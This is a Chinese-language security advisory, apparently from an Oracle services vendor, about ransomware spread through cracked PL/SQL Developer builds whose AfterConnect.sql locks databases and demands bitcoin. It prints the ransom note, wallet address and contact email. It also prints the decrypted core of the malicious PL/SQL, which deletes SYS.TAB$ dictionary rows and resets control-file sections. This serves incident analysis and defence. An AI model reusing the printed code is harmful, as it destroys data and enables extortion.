最近，很多用戶遭遇到數據庫的安全問題，我們在此提示所有Oracle數據庫用戶關注此問題。

[[176378]]

　　問題癥狀：

　　登錄數據庫時，提示數據庫被鎖死，黑客提示發送5個比特幣可以解鎖。

　　在數據庫的日志中，可能獲得的信息如下：

　　ORA-00604: error occurred at recursive SQL level 1

　　ORA-20315: 你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小寫一致) 之后把你的Oracle SID郵寄地址 sqlrush@mail.com 我們將讓你知道如何解鎖你的數據庫

　　Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.

　　ORA-06512: at “XXX.DBMS_CORE_INTERNAL ", line 27

　　ORA-06512: at line 2

　　問題原因：

　　根據我們收集的信息分析，這個問題的原因是：

　　如果用戶從某些不明來源下載了PL/SQL Developer工具后(尤其是各種綠色版、破解版)，這個工具的安裝目錄存在一個腳本文件AfterConnect.sql，正常安裝這個腳本是空文件，但是被注入的文件，該腳本包含了一系列的JOB定義、存儲過程和觸發器定義。

　　受感染的AfterConnect.sql腳本開頭偽裝非常正常的代碼：

　　實質內容卻是加密的惡意代碼：

　　腳本代碼的核心部分解密后如下：

　　BEGIN

　　SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;

　　IF (DATE1>=1200) THEN

　　EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';

　　DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;

　　COMMIT;

　　EXECUTE IMMEDIATE 'alter system checkpoint';

　　SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);

　　FOR I IN 1..2046 LOOP

　　DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');

　　DBMS_SYSTEM.KSDWRT(2, '你的數據庫已被SQL RUSH Team鎖死 發送5個比特幣到這個地址 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (大小寫一致) 之后把你的Oracle SID郵寄地址 sqlrush@mail.com 我們將讓你知道如何解鎖你的數據庫 ');

　　END LOOP;

　　END IF;

　　END;

　　一旦使用這個工具訪問數據庫，相應對象會被后臺自動注入數據庫，執行觸發器阻止后續的用戶登錄，并通過任務Truncate數據庫表。

　　我們強烈建議用戶檢查數據庫工具的使用情況，避免使用來歷不明的工具產品。

　　我們強烈建議：采用正版軟件，規避未知風險。

　　安全漏洞：

　　幾乎絕大多數客戶端工具，在訪問數據庫時，都可以通過腳本進行一定的功能定義，而這些腳本往往就是安全問題的漏洞之一，來歷不明的工具是數據庫管理大忌，以下列出了常見客戶端工具的腳本位置，需要引起注意：

　　SQL*Plus: glogin.sql / login.sql

　　TOAD : toad.ini

　　PLSQLdeveloper: login.sql / afterconnect.sql

　　處置建議：

　　如果您的數據庫已經遭受攻擊和數據損失，可以緊急聯系云和恩墨的服務團隊，我們可以幫助您處理數據修復事宜。云和恩墨的ODU產品，可以在數據丟失后最大限度的恢復數據。

　　事件回顧：

　　2015年9月，XcodeGhost入侵蘋果iOS事件在業內引起不小震動。事件起因為不知名黑客向iOS應用開發工具Xcode植入惡意程序，通過網盤和論壇上傳播，被感染的App并以此劫持蘋果用戶相關信息。來自多個安全團隊數據顯示，病毒感染波及AppStore下載量最高的5000個App其中的76個，保守估計受影響用戶數超過一億。

　　2012年2月，中文版putty等SSH遠程管理工具被曝出存在后門，該后門會自動竊取管理員所輸入的SSH用戶名與口令，并將其發送至指定服務器上。